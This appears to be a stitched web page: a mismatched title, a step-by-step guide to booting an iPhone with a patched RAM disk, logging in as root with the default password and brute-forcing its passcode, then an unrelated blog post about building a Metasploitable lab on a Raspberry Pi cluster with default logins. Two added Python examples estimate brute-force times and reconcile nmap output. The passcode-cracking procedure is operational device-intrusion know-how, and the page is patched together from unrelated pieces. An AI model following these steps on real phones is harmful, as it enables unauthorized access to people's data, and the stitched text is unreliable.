Hack Iphone With Mac Address Kali Linux
“My buddy Aamir Lakhani is developing an iOS security class and recently posted about hacking iOS devices. This is a very popular subject and I want to share it. Also a shout out to Tom Bedwell for his assistance with the research. You can find the original posting at www.cloudcentrics.com”
iOS devices can be booted with their own kernel and micro operating system instead of the approved Apple firmware. Once an iOS device is running such a micro kernel, you can run attacks such as bypassing the passcode, decrypting passwords, copying the file system, viewing emails and much more. The following guide describes how to create a RAM disk; it may not work precisely as a step-by-step instruction set, since each system is unique and requires some level of customization.
Note: If you run into trouble when creating the RAM disk due to unique OS configurations and code versions, don't despair.
If you want to take the easy way:
Download: http://cloudcentrics.com/wp-content/uploads/2012/11/iphone-dataprotection-modifed.zip
then complete step 11 and proceed to step 20.
Now let the real fun begin
IMPORTANT: Watch the word wrap. Many commands are single line and may be wrapped on multiple lines.
Step 1: Uninstall file system readers
If you have a file system tool such as MacFUSE or Tuxera installed, uninstall it before starting and reboot your machine.
Step 2: Install Xcode from the Mac App Store
Step 3: Download and install the Xcode Command Line Tools:
1. Download Xcode from the Mac App Store
2. Launch Xcode and go to Preferences
3. Install the Xcode Command Line Tools and simulators
Step 4: Open the Terminal App.
Make sure you are in your home directory. In my case the home directory is /Users/alakhani
Step 5: Install ldid
ldid is used to self-sign the pieces of code that we will upload to the iPhone.
1. curl -O http://networkpx.googlecode.com/files/ldid
2. chmod +x ldid
3. sudo mv ldid /usr/bin/
Step 6: Install FUSE
1. First verify the latest version of FUSE (go to http://osxfuse.github.com). This posting uses 2.5.4. You do not need to download it from there; we will download it via the command line.
FUSE is an extension that allows Mac OS X to read non-native file systems.
2. curl -O -L https://github.com/downloads/osxfuse/osxfuse/OSXFUSE-2.5.4.dmg
3. hdiutil mount OSXFUSE-2.5.4.dmg
4. sudo installer -pkg "/Volumes/FUSE for OS X/Install OSXFUSE 2.5.pkg" -target /
You will see this once it installs:
5. sudo hdiutil eject "/Volumes/FUSE for OS X/"
Step 6: Download and install Python packages
OS X 10.8.x comes preloaded with Python. However, we still need to add some Python packages.
1. sudo ARCHFLAGS='-arch i386 -arch x86_64' easy_install pycrypto
2. sudo easy_install M2crypto construct progressbar
Step 7: Download and install Mercurial
- Go to http://mercurial.selenic.com/
- Download and install Mercurial, 2.4 or later
Step 8: Download iPhone Data Protection Utilities
1. hg clone https://code.google.com/p/iphone-dataprotection/ (note: if the command does not work, you did not install Mercurial).
2. cd iphone-dataprotection
Step 9: Create script to encrypt and decrypt the RAM disk and kernel
Compile img3fs.c. This tool is used to encrypt and decrypt the RAM disk and the kernel patch.
I ran into issues and had to change the compiler path. You can change this by editing the makefile in the img3fs folder.
1. make -C img3fs/
Step 10: Download Redsn0w
Verify the latest version of Redsn0w. At the time of writing, 0.9.15b3 is the latest version.
You can verify the latest version by going to: http://www.iphonehacks.com/download-redsn0w. There is no need to download it there; we will retrieve it directly into our working directory from the command line.
1. curl -O -L https://sites.google.com/a/iphonedev.com/files/home/redsn0w_mac_0.9.15b3.zip
2. unzip redsn0w_mac_0.9.15b3.zip
You will now copy the encryption keys
Step 11: Download iOS firmware
You will need a copy of the iOS firmware for your device that is jailbreakable. That can be found at http://www.getios.com
NOTE: This requires jailbreakable iOS firmware and a jailbreakable device. The iPhone 5 is not supported at the time of posting.
Step 12: Copy iOS firmware from your downloads folder (or where saved) to your iPhone Data Protection Folder
Step 13: Create a patched kernel and shell script
python python_scripts/kernel_patcher.py iPhone3,3_5.1.1_9B206_Restore.ipsw
Step 15: Create RAM DISK
sh ./make_ramdisk_n92ap.sh
Step 16: iOS SDK not found
The locations of the iOS SDKs have changed.
- Find where your iOS SDK is by typing the following command: xcode-select -print-path
- Edit the make_ramdisk_n92ap.sh file
Change the following:
(Old)
"/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS$VER.sdk/System/Library/Frameworks/IOKit.framework/IOKit" ];
(New) Change it to the relevant path of your SDK (note the leading slash; the path must be absolute)
"/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS6.0.sdk/System/Library/Frameworks/IOKit.framework/IOKit" ];
(Old)
./build_ramdisk.sh iPhone3,3_5.1.1_9B206_Restore.ipsw 038-4361-021.dmg 28db49d00990ced317a7bcd24755b3426bb246cb135111126d8b3f7bb8ba9252 c248e221c08ece5862fea42a58dad552 myramdisk_n92ap.dmg
(New) Change it to the relevant ipsw you downloaded
./build_ramdisk.sh iPhone3,3_5.1.1_9B206_Restore.ipsw 038-4361-021.dmg 28db49d00990ced317a7bcd24755b3426bb246cb135111126d8b3f7bb8ba9252 c248e221c08ece5862fea42a58dad552 myramdisk_n92ap.dmg
Step 17: Create symbolic link
Create the symbolic link: sudo ln -s /Applications/Xcode.app/Contents/Developer /
Step 18: Run script again
Run the make command again: sudo sh ./make_ramdisk_n92ap.sh
(Important: make sure you run it with sudo)
Note: If you skipped the earlier steps, or could not get step 18 to build a RAM disk, you can download a pre-created version of the RAM disk here: http://cloudcentrics.com/wp-content/uploads/2012/11/iphone-dataprotection-modifed.zip
After you download the pre-created RAM disk you can move to step 20.
You will also need to download a copy of jailbreakable iOS firmware as described in step 11.
Step 20: Load RAM disk
Make sure the device is plugged in and turned off. The device needs to be plugged in BEFORE it is turned off.
Run the following command:

sudo ./redsn0w_mac_0.9.15b3/redsn0w.app/Contents/MacOS/redsn0w -i iPhone3,3_5.1.1_9B206_Restore.ipsw -r myramdisk_n90ap.dmg -k kernelcache.release.n90.patched
(Note: You will need to change the iPhone firmware name to the one appropriate for your device).
You will also need to change to the correct version and path of redsn0w.
Step 21: Follow the on-screen instructions
Lastly, wait a minute until you see the OK on the screen.
Step 22: USB MUX
Next, establish a connection from your computer to the phone. It's done using a reverse SSH connection through the USB cable. Essentially, it's the same way iTunes communicates with the iPhone over USB. The process is called USB multiplexing. It establishes a TCP connection over USB using SSL.
From your terminal screen on the Mac run the following command:

(note: open a new terminal tab)
python usbmuxd-python-client/tcprelay.py -t 22:2222 1999:1999
Step 23: SSH into the phone
Open a new terminal tab
SSH into the phone
Type the following command:
ssh -p 2222 root@localhost
password: alpine
Step 24: Follow the on-screen instructions
Open a New terminal tab on your Mac:
Type the following command:

python python_scripts/demo_bruteforce.py
(when you are prompted to provide the device's passcode, leave it blank)
Run the brute force passcode cracker. It is pre-configured to brute force any 4-digit simple passcode. It takes approximately 25 minutes to run through all possible combinations. You can modify the script to crack more complex passcodes and PINs.
In our case the passcode was "0111".
The script by default will brute force 4-digit passcodes. It starts with "0000", then moves on to "0001, 0002, 0003..." and so on. It takes approximately 25 minutes to cycle through all 10,000 combinations and reach 9999.
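The timing figure above (all 10,000 four-digit PINs in about 25 minutes) is the only input to the following added example, which is not part of the original post or of the iphone-dataprotection scripts. It turns that measured rate into worst-case and expected search times for longer and alphanumeric passcode policies, which is the number a defender choosing a passcode policy actually wants. It assumes the per-guess rate stays constant regardless of passcode length; the post does not measure longer passcodes, so that is a stated simplification rather than a result from the page.

```python
"""Estimate passcode brute-force times from a measured guessing rate.

Added example, not from the original post. The only figure taken from the
post is its measurement: all 10,000 four-digit PINs in about 25 minutes.
Everything else assumes that rate stays constant for longer or alphanumeric
passcodes, which is a simplification (the post reports no such rates).
"""
from dataclasses import dataclass

MEASURED_GUESSES = 10_000          # 4-digit PINs, "0000" .. "9999"
MEASURED_SECONDS = 25 * 60         # ~25 minutes, as reported in the post
GUESSES_PER_SECOND = MEASURED_GUESSES / MEASURED_SECONDS  # about 6.7 per second


@dataclass(frozen=True)
class Policy:
    name: str
    length: int
    alphabet: int   # number of distinct symbols allowed per position


# Assumed policies to compare against the post's 4-digit PIN.
POLICIES = [
    Policy("4-digit PIN", 4, 10),
    Policy("6-digit PIN", 6, 10),
    Policy("8 chars, lowercase letters", 8, 26),
    Policy("8 chars, letters + digits", 8, 62),
]


def keyspace(policy):
    """Number of distinct passcodes the policy allows."""
    return policy.alphabet ** policy.length


def worst_case_seconds(policy, rate=GUESSES_PER_SECOND):
    """Time to exhaust the whole keyspace at a constant guessing rate."""
    return keyspace(policy) / rate


def expected_seconds(policy, rate=GUESSES_PER_SECOND):
    """Average time to hit a uniformly chosen passcode (half the keyspace)."""
    return worst_case_seconds(policy, rate) / 2


def human(seconds):
    """Render a duration in the largest convenient unit, one decimal place."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"


if __name__ == "__main__":
    print(f"measured rate: {GUESSES_PER_SECOND:.2f} guesses/s")
    for p in POLICIES:
        print(f"{p.name:28} keyspace {keyspace(p):>18,}  "
              f"worst {human(worst_case_seconds(p)):>16}  "
              f"expected {human(expected_seconds(p)):>16}")
```

Run as a script it prints one row per policy; the 4-digit row reproduces the post's 25 minutes, the 6-digit row lands at about 1.7 days worst case, and the alphanumeric rows run to years, which is the practical argument for a longer passcode on a device whose storage can be attacked this way.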
Step 25: Reboot
Go to the SSH tab for your phone
Issue the command: reboot
References:
I wanted to thank Satish at http://resources.infosecinstitute.com/iphone-forensics/ for his post and the work he did on the same topic. In the above article you will find my modifications, since I was running OS X 10.8.2 and a newer version of Xcode.
However, I encourage everyone to check out http://resources.infosecinstitute.com/iphone-forensics/ and read the instructions and watch Satish’s YouTube video at http://www.youtube.com/watch?feature=player_embedded&v=hp-Mrw4yo9o
Hacking the iPhone: Breaking Pins and Passcodes: Booting without approved Apple Firmware
I'm not a hacker, I don't see the good that can come from it really. But I do want to know how to do it so I can take the necessary precautions. Also, I read about hacking and wonder sometimes if it really is possible these days. The attack vector which exploits the vulnerabilities of humans, as I've said before, does not interest me so much. I am more interested in these two attack vector types:

- A network and/or server that has the proper security tools and hardware, but they are incorrectly configured or installed
- A network and/or server that has the proper security tools and hardware which are correctly configured and installed, but still has a vulnerability
A good place to start is with the Kali Linux Metasploit penetration toolkit which you can get and learn about here.
Figure 1, Kali Linux Metasploit toolkit
Those tools are cool, but you need something to use them on. Knowing that hacking is illegal, I read someplace that even scanning endpoints for vulnerabilities, even if you don't exploit them, has some serious consequences. I therefore have built an instance of Metasploitable which I downloaded from Rapid7. I must admit that I wanted to use Microsoft products to make this happen, but suffered some real setbacks when I was doing it. I made it through most of them but finally met my match when trying to get the Metasploitable server to get an IP address while running in Hyper-V. Yes, I did convert the VMDK to a VHD and all. I simply wasn't, and still am not, so skilled with Linux as to get the eth0 configuration to show an IP address. So I downloaded, installed and configured VirtualBox with the VMDK and it worked like a snap. Figure 2 shows VirtualBox and Figure 3 shows what I had been after for a few months; actually, my first attempt at this was over a year ago. I must have really wanted this, yes, indeed I did.
Figure 2, VirtualBox running Metasploitable
Figure 3, Metasploitable login screen and ifconfig
Note to self: I do not remember making a configuration to add Metasploitable to a different subnet than my other Raspberry Pis I am going to use for running Kali. The Pis were 192.168.1.2 – 192.168.1.10; somehow metasploitable00 got 10.0.2.15, as I show in Figure 3. Not sure if this will cause me some more headaches, but I remain optimistic that my controller Pi and Kali Pi will find it when I do an NMAP. In case you are interested, I created a Raspberry Pi cluster which I documented here.
Just for my general recollection:
| IP Address | Role | Name | Network |
|---|---|---|---|
| 192.168.1.0 | Broadcast | N/A | N/A |
| 192.168.1.1 | Router | N/A | N/A |
| 192.168.1.2 | Raspberry Pi Controller | controller | Wireless |
| 192.168.1.3 | Raspberry Pi Node (SenseHat) | node00 | Wireless |
| 192.168.1.4 | Raspberry Pi Node | node01 | Wired |
| 192.168.1.5 | Raspberry Pi Node | node02 | Wired |
| 192.168.1.6 | Raspberry Pi Node | node03 | Wired |
| 192.168.1.7 | Raspberry Pi Node | node04 | Wired |
| 192.168.1.8 | Raspberry Pi Node (SenseHat) | node05 | Wired |
| 192.168.1.9 | Raspberry Pi Node (6502) | node06 | Wired |
| 192.168.1.10 | Raspberry Pi Node (Kali Linux) | node07 (kali) | Wired |
| 192.168.1.11 | Raspberry Pi Node | node08 | Wired |
| 192.168.1.12 | Windows VM host | win00 | Wired |
| 192.168.1.13 | metasploitable00 | METASPLOITABLE | Wired |
Well, it turns out that the default IP configuration for a VM running with VirtualBox is to use Network Address Translation (NAT). This is helpful and useful when I want my VM to make outbound connections (in this case I do not) and not useful when I want to access the VM from other machines on my network (this is what I need/want to do). The default IP for this is what I quoted earlier, 10.0.2.15. As you can see in Figure 4, NMAP from my controller cannot find this one, so I will need to make some configuration changes and implement Bridged Networking, which is apparently what I need.
Figure 4, NMAP from my raspberry pi node cluster controller
Let's do this and hope it works out. I shut down the VM and changed the Network settings as shown in Figure 5. My host machine is connecting to the network using wireless; you can see in Figure 5 that Cable Connection is unchecked, I assume that is what it means. Let's press OK and see what happens.
Figure 5, setting the Network Adaptor on my VirtualBox Metasploitable VM
No go; memories of my Hyper-V trials and hardships are beginning to return. Let's connect a cable and see if that changes anything. Fingers crossed! I'm going to go ahead and shut down the host running the VM as well before I insert the ethernet (RJ-45) cable. Nope, here we go again... wait, I forgot to check that Cable Connection box. Holy smokes, let's go, Figure 6 shows it got the 192.168.1.13 IP address allocated.
Figure 6, Bridged Networking configured with a Metasploitable VM using VirtualBox on Windows 10
Well, that did work and I am happy about that. As you can see in Figure 7, something is a little weird with the IPs. IP address 192.168.1.12 should be the address of win00, and 192.168.1.13 is a good number for METASPLOITABLE, lucky number 13. It's weird because the MAC address for win00 is the one for metasploitable00 and the MAC address of win00 is the one shown for METASPLOITABLE. I'll need to check this out and see what's going on. 192.168.1.13 does have SSH enabled so this has to be the metasploitable00 VM, because I tried the same for win00 (192.168.1.12) and it timed out because SSH is not yet enabled on that machine. I can fix this; it's just surprising because I only know because I know, no one else would know without having set this up...
Figure 7, NMAP and Router IP configuration
If I look at the list it turns out node06 didn’t connect. Also, when I changed node00 to connect via wireless, using these instructions from wired, it got a new IP address and I needed to delete and re-add the address reservation in the router. All is good with node00 and node06 now, both have a static / reserved IP address. When I swap out the OS image on node07 where I will run the Metasploit toolkit with Kali Linux I get the same IP address as I got when it was running the Raspbian OS, this kind of confirms that the IP allocation is based on MAC Address, which I suspected before and now believe to be most probably true.
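The NMAP checks and the MAC/IP confusion described above are the kind of thing a small reconciliation script catches on every run, so here is an added example; it is not code from the original post. It parses nmap's normal output (the "Nmap scan report for" and "MAC Address:" lines you get when scanning as root on the local segment), compares it with a table of reserved addresses like the one above, and reports hosts that did not answer, hosts whose observed MAC differs from the reservation, and answering hosts that are not in the table at all. The inventory MACs and the scan text are constructed sample data (only the VirtualBox and Raspberry Pi vendor prefixes are real).

```python
"""Reconcile a LAN inventory (reserved IP -> host name, MAC) with nmap output.

Added example, not part of the original post. The inventory mirrors a few
rows of the post's address table; the MAC addresses and the nmap output are
constructed sample data (the 08:00:27 VirtualBox and b8:27:eb Raspberry Pi
OUIs are real, the remaining octets are made up).
"""
import re

# Expected assignments: IP -> (host name, reserved MAC). MACs are constructed.
INVENTORY = {
    "192.168.1.2":  ("controller",       "b8:27:eb:00:00:02"),
    "192.168.1.9":  ("node06",           "b8:27:eb:00:00:09"),
    "192.168.1.10": ("node07 (kali)",    "b8:27:eb:00:00:0a"),
    "192.168.1.12": ("win00",            "08:00:27:11:11:12"),
    "192.168.1.13": ("metasploitable00", "08:00:27:13:13:13"),
}

# Constructed sample of nmap normal output (nmap -sn run as root, so MAC lines
# are present). node06 is absent, the two VirtualBox-hosted entries report each
# other's MAC, and an unlisted host answers: the situations the post describes.
SAMPLE_SCAN = """\
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.1.2
Host is up (0.0010s latency).
MAC Address: B8:27:EB:00:00:02 (Raspberry Pi Foundation)
Nmap scan report for 192.168.1.10
Host is up (0.0021s latency).
MAC Address: B8:27:EB:00:00:0A (Raspberry Pi Foundation)
Nmap scan report for 192.168.1.12
Host is up (0.0015s latency).
MAC Address: 08:00:27:13:13:13 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.13
Host is up (0.0017s latency).
MAC Address: 08:00:27:11:11:12 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.1.20
Host is up (0.0030s latency).
MAC Address: 00:11:22:33:44:55 (Unknown)
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.50 seconds
"""

# Handles both "Nmap scan report for 1.2.3.4" and "... for name (1.2.3.4)".
REPORT_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")


def parse_nmap(text):
    """Return {ip: mac_or_None} for every host nmap reported on."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = None          # MAC may follow on a later line
            continue
        m = MAC_RE.match(line)
        if m and current:
            hosts[current] = m.group(1).lower()
    return hosts


def reconcile(inventory, scanned):
    """Compare expected reservations against what the scan actually saw.

    Returns (missing, mismatched, unexpected): inventory hosts that did not
    answer as (ip, name); hosts whose MAC differs from the reservation as
    (ip, name, reserved_mac, seen_mac); answering IPs not in the inventory.
    """
    missing, mismatched, unexpected = [], [], []
    for ip, (name, mac) in inventory.items():
        if ip not in scanned:
            missing.append((ip, name))
        elif scanned[ip] is not None and scanned[ip] != mac.lower():
            mismatched.append((ip, name, mac.lower(), scanned[ip]))
    for ip in scanned:
        if ip not in inventory:
            unexpected.append(ip)
    return missing, mismatched, unexpected


if __name__ == "__main__":
    missing, mismatched, unexpected = reconcile(INVENTORY, parse_nmap(SAMPLE_SCAN))
    for ip, name in missing:
        print(f"MISSING     {ip:15} {name}")
    for ip, name, want, got in mismatched:
        print(f"MAC CHANGED {ip:15} {name}: reserved {want}, seen {got}")
    for ip in unexpected:
        print(f"UNEXPECTED  {ip:15} not in inventory")
```

To use it against a real scan, replace SAMPLE_SCAN with the saved output of a scan run with -oN, and fill the inventory from the router's reservation table; a MAC mismatch then means either a swapped reservation (as in the post) or a host you did not expect answering on that address.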
I enabled SSH, IIS and SMB 1.0 on win00 since I might want to do some hacking of the Windows 10 host at some point in the future. I used the Windows Feature from the Control Panel to install those drivers and programs, as seen in Figure 8.
Figure 8, Installing some protocols that expose a network endpoint for future hacking opportunities
I can't figure out the IP address allocation logic with win00 and METASPLOITABLE. There is one IP address, 192.168.1.12, which is linked to the "Wireless LAN adapter Wi-Fi" configuration when I look at the ipconfig, while 192.168.1.13 is the "Ethernet adapter Ethernet". METASPLOITABLE is allocated 192.168.1.14 and I was able to SSH to it from my controller. I haven't tried from Kali yet, but will do it first thing when I'm ready to do some labs. I feel like the infrastructure is set up now and once I get some time I can start getting to it.
Some helpful Linux commands:
ifconfig
ssh userid@192.168.1.?
sudo shutdown -h now
sudo reboot
Logins (user/password):
pi/raspberry
kali/kali
METASPLOITABLE/kali